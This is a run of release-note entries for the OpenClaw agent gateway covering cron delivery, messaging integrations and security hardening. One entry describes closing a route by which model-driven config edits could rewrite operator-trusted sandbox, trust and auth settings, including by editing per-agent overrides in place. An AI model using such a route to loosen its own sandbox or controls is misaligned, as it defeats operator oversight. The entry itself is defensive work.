<li>Context engine/plugins: stop rejecting third-party context engines whose <code>info.id</code> differs from the registered plugin slot id. The strict-match contract added in 2026.4.14 broke <code>lossless-claw</code> and other plugins whose internal engine id does not equal the slot id they are registered under, producing repeated <code>info.id must match registered id</code> lane failures on every turn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4262699518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66601/hovercard" href="https://github.com/openclaw/openclaw/issues/66601">#66601</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263541400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66678" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66678/hovercard" href="https://github.com/openclaw/openclaw/pull/66678">#66678</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>.</li>
<li>Agents/compaction: rename embedded Pi compaction lifecycle events to <code>compaction_start</code> / <code>compaction_end</code> so OpenClaw stays aligned with <code>pi-coding-agent</code> 0.66.1 event naming. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276557549" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67713" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67713/hovercard" href="https://github.com/openclaw/openclaw/pull/67713">#67713</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mpz4life/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mpz4life">@mpz4life</a>.</li>
<li>Security/dotenv: block all <code>OPENCLAW_*</code> keys from untrusted workspace <code>.env</code> files so workspace-local env loading fails closed for new runtime-control variables instead of silently inheriting them. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3792286847" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/473" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/473/hovercard" href="https://github.com/openclaw/openclaw/pull/473">#473</a>)</li>
<li>Gateway/device pairing: restrict non-admin paired-device sessions (device-token auth) to their own pairing list, approve, and reject actions so a paired device cannot enumerate other devices or approve/reject pairing requests authored by another device. Admin and shared-secret operator sessions retain full visibility. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296863737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69375" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69375/hovercard" href="https://github.com/openclaw/openclaw/pull/69375">#69375</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Agents/gateway tool: extend the agent-facing <code>gateway</code> tool's config mutation guard so model-driven <code>config.patch</code> and <code>config.apply</code> cannot rewrite operator-trusted paths (sandbox, plugin trust, gateway auth/TLS, hook routing and tokens, SSRF policy, MCP servers, workspace filesystem hardening) and cannot bypass the guard by editing per-agent sandbox, tools, or embedded-Pi overrides in place under <code>agents.list[]</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296871568" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69377" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69377/hovercard" href="https://github.com/openclaw/openclaw/pull/69377">#69377</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Gateway/websocket broadcasts: require <code>operator.read</code> (or higher) for chat, agent, and tool-result event frames so pairing-scoped and node-role sessions no longer passively receive session chat content, and scope-gate unknown broadcast events by default. Plugin-defined <code>plugin.*</code> broadcasts are scoped to operator.write/admin, and status/transport events (<code>heartbeat</code>, <code>presence</code>, <code>tick</code>, etc.) remain unrestricted. Per-client sequence numbers preserve per-connection monotonicity. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296861178" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69373" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69373/hovercard" href="https://github.com/openclaw/openclaw/pull/69373">#69373</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Agents/compaction: always reload embedded Pi resources through an explicit loader and reapply reserve-token overrides so runs without extension factories no longer silently lose compaction settings before session start. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268517877" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67146" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67146/hovercard" href="https://github.com/openclaw/openclaw/pull/67146">#67146</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ly85206559/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ly85206559">@ly85206559</a>.</li>
<li>Memory-core/dreaming: normalize sweep timestamps and reuse hashed narrative session keys for fallback cleanup so Dreaming narrative sub-sessions stop leaking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4266758639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67023" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67023/hovercard" href="https://github.com/openclaw/openclaw/pull/67023">#67023</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chiyouYCH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chiyouYCH">@chiyouYCH</a>.</li>
<li>Gateway/startup: delay HTTP bind until websocket handlers are attached, so immediate post-startup websocket health/connect probes no longer hit the startup race window. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4059738654" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43392" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43392/hovercard" href="https://github.com/openclaw/openclaw/pull/43392">#43392</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dalefrieswthat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dalefrieswthat">@dalefrieswthat</a>.</li>
<li>Codex/app-server: release the session lane when a downstream consumer throws while draining the <code>turn/completed</code> notification, so follow-up messages after a Codex plugin reply stop queueing behind a stale lane lock. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4280454021" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67996" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67996/hovercard" href="https://github.com/openclaw/openclaw/issues/67996">#67996</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291737285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69072" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69072/hovercard" href="https://github.com/openclaw/openclaw/pull/69072">#69072</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ayeshakhalid192007-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ayeshakhalid192007-dev">@ayeshakhalid192007-dev</a>.</li>
<li>Codex/app-server: default approval handling to <code>on-request</code> so Codex harness sessions do not start with overly permissive tool approvals. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289424033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68721/hovercard" href="https://github.com/openclaw/openclaw/pull/68721">#68721</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Cron/delivery: keep isolated cron chat delivery tools available, resolve <code>channel: "last"</code> targets from the gateway, show delivery previews in <code>cron list/show</code>, and avoid duplicate fallback sends after direct message-tool delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300215528" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69587" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69587/hovercard" href="https://github.com/openclaw/openclaw/pull/69587">#69587</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Cron/Telegram: key isolated direct-delivery dedupe to each cron execution instead of the reused session id, so recurring Telegram announce runs no longer report delivered while silently skipping later sends. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291263208" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69000" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69000/hovercard" href="https://github.com/openclaw/openclaw/pull/69000">#69000</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Models/Kimi: default bundled Kimi thinking to off and normalize Anthropic-compatible <code>thinking</code> payloads so stale session <code>/think</code> state no longer silently re-enables reasoning on Kimi runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290528589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68907" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68907/hovercard" href="https://github.com/openclaw/openclaw/pull/68907">#68907</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
<li>Control UI/cron: keep the runtime-only <code>last</code> delivery sentinel from being materialized into persisted cron delivery and failure-alert channel configs when jobs are created or edited. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289970519" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68829" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68829/hovercard" href="https://github.com/openclaw/openclaw/pull/68829">#68829</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tianhaocui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tianhaocui">@tianhaocui</a>.</li>
<li>OpenAI/Responses: strip orphaned reasoning blocks before outbound Responses API calls so compacted or restored histories no longer fail on standalone reasoning items. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4152395683" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55787" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55787/hovercard" href="https://github.com/openclaw/openclaw/pull/55787">#55787</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/suboss87/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/suboss87">@suboss87</a>.</li>
<li>Cron/CLI: parse PowerShell-style <code>--tools</code> allow-lists the same way as comma-separated input, so <code>cron add</code> and <code>cron edit</code> no longer persist <code>exec read write</code> as one combined tool entry on Windows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290205612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68858" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68858/hovercard" href="https://github.com/openclaw/openclaw/pull/68858">#68858</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chen-zhang-cs-code/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chen-zhang-cs-code">@chen-zhang-cs-code</a>.</li>
<li>Browser/user-profile: let existing-session <code>profile="user"</code> tool calls auto-route to a connected browser node or use explicit <code>target="node"</code>, while still honoring explicit <code>target="host"</code> pinning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085904719" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48677" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48677/hovercard" href="https://github.com/openclaw/openclaw/issues/48677">#48677</a>)</li>
<li>Discord/slash commands: tolerate partial Discord channel metadata in slash-command and model-picker flows so partial channel objects no longer crash when channel names, topics, or thread parent metadata are unavailable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290804745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68953" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68953/hovercard" href="https://github.com/openclaw/openclaw/pull/68953">#68953</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dutifulbob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dutifulbob">@dutifulbob</a>.</li>
<li>BlueBubbles: consolidate outbound HTTP through a typed <code>BlueBubblesClient</code> that resolves the SSRF policy once at construction so image attachments stop getting blocked on localhost and reactions stop getting blocked on private-IP BB deployments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4023129569" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/34749" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/34749/hovercard" href="https://github.com/openclaw/openclaw/issues/34749">#34749</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194995882" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59722" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59722/hovercard" href="https://github.com/openclaw/openclaw/issues/59722">#59722</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284406818" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68234" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68234/hovercard" href="https://github.com/openclaw/openclaw/pull/68234">#68234</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Cron/gateway: reject ambiguous announce delivery config at add/update time so invalid multi-channel or target-id provider settings fail early instead of persisting broken cron jobs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291352604" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69015" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69015/hovercard" href="https://github.com/openclaw/openclaw/pull/69015">#69015</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Cron/main-session delivery: preserve <code>heartbeat.target="last"</code> through deferred wake queuing, gateway wake forwarding, and same-target wake coalescing so queued cron replies still return to the last active chat. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291431965" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69021" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69021/hovercard" href="https://github.com/openclaw/openclaw/pull/69021">#69021</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Cron/gateway: ignore disabled channels when announce delivery ambiguity is checked, and validate main-session delivery patches against the live cron service default agent so hot-reloaded agent config does not falsely reject valid updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291549667" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69040" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69040/hovercard" href="https://github.com/openclaw/openclaw/pull/69040">#69040</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Matrix/allowlists: hot-reload <code>dm.allowFrom</code> and <code>groupAllowFrom</code> entries on inbound messages while keeping config removals authoritative, so Matrix allowlist changes no longer require a channel restart to add or revoke a sender. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287996083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68546" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68546/hovercard" href="https://github.com/openclaw/openclaw/pull/68546">#68546</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/johnlanni/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/johnlanni">@johnlanni</a>.</li>
<li>BlueBubbles: always set <code>method</code> explicitly on outbound text sends (<code>"private-api"</code> when available, <code>"apple-script"</code> otherwise), and prefer Private API on macOS 26 even for plain text. Fixes silent delivery failure on macOS setups without Private API where an omitted <code>method</code> let BB Server fall back to version-dependent default behavior that silently drops the message (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241374191" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64480/hovercard" href="https://github.com/openclaw/openclaw/issues/64480">#64480</a>), and the AppleScript <code>-1700</code> error on macOS 26 Tahoe plain text sends (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123765293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53159" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53159/hovercard" href="https://github.com/openclaw/openclaw/issues/53159">#53159</a>). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291714430" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69070" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69070/hovercard" href="https://github.com/openclaw/openclaw/pull/69070">#69070</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xqing3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xqing3">@xqing3</a>.</li>
<li>Matrix/commands: recognize slash commands that are prefixed with the bot's Matrix mention, so room messages like <code>@bot:server /new</code> trigger the command path without requiring custom mention regexes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288071010" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68570" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68570/hovercard" href="https://github.com/openclaw/openclaw/pull/68570">#68570</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nightq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nightq">@nightq</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/johnlanni/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/johnlanni">@johnlanni</a>.</li>
<li>Gateway/pairing: return reason-specific <code>PAIRING_REQUIRED</code> details, remediation hints, and request ids so unapproved-device and scope-upgrade failures surface actionable recovery guidance in the CLI and Control UI. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293547943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69227" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69227/hovercard" href="https://github.com/openclaw/openclaw/pull/69227">#69227</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Agents/subagents: include requested role and runtime timing on subagent failure payloads so parent agents can correlate failed or timed-out child work. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289498591" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68726/hovercard" href="https://github.com/openclaw/openclaw/pull/68726">#68726</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BKF-Gitty/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BKF-Gitty">@BKF-Gitty</a>.</li>
<li>Gateway/sessions: reject stale agent-scoped sessions after an agent is removed from config while preserving legacy default-agent main-session aliases. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255696700" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65986" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65986/hovercard" href="https://github.com/openclaw/openclaw/pull/65986">#65986</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</li>
<li>Doctor/gateway: surface pending device pairing requests, scope-upgrade approval drift, and stale device-token mismatch repair steps so <code>openclaw doctor --fix</code> no longer leaves pairing/auth setup failures unexplained. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293335700" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69210" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69210/hovercard" href="https://github.com/openclaw/openclaw/pull/69210">#69210</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Cron/isolated-agent: preserve explicit <code>delivery.mode: "none"</code> message targets for isolated runs without inheriting implicit <code>last</code> routing, so agent-initiated Telegram sends keep their authored destination while bare <code>mode:none</code> jobs stay targetless. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292669912" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69153" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69153/hovercard" href="https://github.com/openclaw/openclaw/pull/69153">#69153</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Cron/isolated-agent: keep <code>delivery.mode: "none"</code> account-only or thread-only configs from inheriting a stale implicit recipient, so isolated runs only resolve message routing when the job authored an explicit <code>to</code> target. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292789440" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69163" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69163/hovercard" href="https://github.com/openclaw/openclaw/pull/69163">#69163</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Gateway/TUI: retry session history while the local gateway is still finishing startup, so <code>openclaw tui</code> reconnects no longer fail on transient <code>chat.history unavailable during gateway startup</code> errors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292804514" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69164" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69164/hovercard" href="https://github.com/openclaw/openclaw/pull/69164">#69164</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>BlueBubbles/reactions: fall back to <code>love</code> when an agent reacts with an emoji outside the iMessage tapback set (<code>love</code>/<code>like</code>/<code>dislike</code>/<code>laugh</code>/<code>emphasize</code>/<code>question</code>), so wider-vocabulary model reactions like <code>👀</code> still produce a visible tapback instead of failing the whole reaction request. Configured ack reactions still validate strictly via the new <code>normalizeBlueBubblesReactionInputStrict</code> path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243500979" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64693" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64693/hovercard" href="https://github.com/openclaw/openclaw/pull/64693">#64693</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>BlueBubbles: prefer iMessage over SMS when both chats exist for the same handle, honor explicit <code>sms:</code> targets, and never silently downgrade iMessage-available recipients. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210722336" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61781" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61781/hovercard" href="https://github.com/openclaw/openclaw/pull/61781">#61781</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmartin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmartin">@rmartin</a>.</li>
<li>Telegram/setup: require numeric <code>allowFrom</code> user IDs during setup instead of offering unsupported <code>@username</code> DM resolution, and point operators to <code>from.id</code>/<code>getUpdates</code> for discovery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293079476" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69191" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69191/hovercard" href="https://github.com/openclaw/openclaw/pull/69191">#69191</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>GitHub Copilot/onboarding: default GitHub Copilot setup to <code>claude-opus-4.6</code> and keep the bundled default model list aligned, so new Copilot setups no longer start on the older <code>gpt-4o</code> default. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293294985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69207" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69207/hovercard" href="https://github.com/openclaw/openclaw/pull/69207">#69207</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Gateway/status: separate reachability, capability, and read-probe reporting so connect-only or scope-limited sessions no longer look fully healthy, and normalize SSH targets entered as <code>ssh user@host</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293399234" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69215" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69215/hovercard" href="https://github.com/openclaw/openclaw/pull/69215">#69215</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Slack: fix outbound replies failing with "unresolved SecretRef" for accounts configured via <code>file</code> or <code>exec</code> secret sources; the send path now tolerates the runtime snapshot retaining an unresolved channel SecretRef when a boot-resolved token override is already available. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290804972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68954" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68954/hovercard" href="https://github.com/openclaw/openclaw/pull/68954">#68954</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Control UI/device pairing: explain scope and role approval upgrades during reconnects, and show requested versus approved access in the Control UI and <code>openclaw devices</code> so broader reconnects no longer look like lost pairings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293523329" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69221" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69221/hovercard" href="https://github.com/openclaw/openclaw/pull/69221">#69221</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
